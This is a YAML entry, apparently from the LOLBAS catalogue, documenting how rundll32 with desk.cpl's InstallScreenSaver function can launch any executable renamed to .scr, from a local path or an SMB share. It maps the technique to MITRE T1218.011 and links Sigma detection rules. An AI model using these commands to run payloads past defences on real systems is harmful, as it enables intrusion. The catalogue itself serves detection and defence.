--- Name: Desk.cpl Description: Desktop Settings Control Panel Author: Hai Vaknin Created: 2022-04-21 Commands: - Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/1d7ee1cd197d3b35508e2a5bf34d9d3b6ca4f504/rules/windows/file/file_event/file_event_win_new_src_file.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml Resources: - Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt - Link: https://twitter.com/pabraeken/status/998627081360695297 - Link: https://twitter.com/VakninHai/status/1517027824984547329 - Link: https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files Acknowledgement: - Person: Rafael S Marques Handle: '@pegabizu' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' - Person: hai Handle: '@VakninHai' - Person: Christopher Peacock Handle: '@SecurePeacock' - Person: Jose Luis Sanchez Handle: '@Joseliyo_Jstnk'